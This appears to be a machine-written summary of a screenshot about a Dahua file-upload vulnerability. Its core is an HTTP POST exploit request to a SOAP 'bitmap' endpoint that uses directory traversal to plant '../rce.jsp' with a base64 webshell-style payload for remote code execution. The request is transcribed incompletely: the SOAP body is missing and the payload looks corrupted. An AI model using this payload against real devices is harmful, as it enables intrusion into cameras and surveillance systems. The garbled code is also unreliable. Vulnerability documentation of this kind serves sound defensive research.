From this webpage screenshot, the following key information about the vulnerability can be obtained: - **Vulnerability Name**: dahua_bitmap_fileupload - **Source**: https://mp.weixin.qq.com/s/OkZk0F9-uNQ1qekE7f-FUg, published on February 19, 2024. - **Vulnerability Description**: This vulnerability involves the file upload functionality in Dahua devices, allowing malicious file uploads via SOAP requests. ### Key Code Example: ```http POST /emap/webservice/gis/soap/bitmap HTTP/1.1 Host: 127.0.0.1 Content-Type: text/xml; charset=utf-8 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.22 ../rce.jsp PCUgaWYoIjEyMyIuZXFlYWXzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2Q1KSkpeyBq' ``` ### Key Points: - **Request Method**: POST - **Target Path**: `/emap/webservice/gis/soap/bitmap` - **Malicious File Path**: `../rce.jsp`, indicating potential directory traversal and arbitrary file upload risks. - **Payload**: Contains malicious code, likely intended for Remote Code Execution (RCE). This information indicates that the vulnerability allows attackers to upload malicious files via a specific SOAP request, potentially enabling arbitrary code execution on the target system.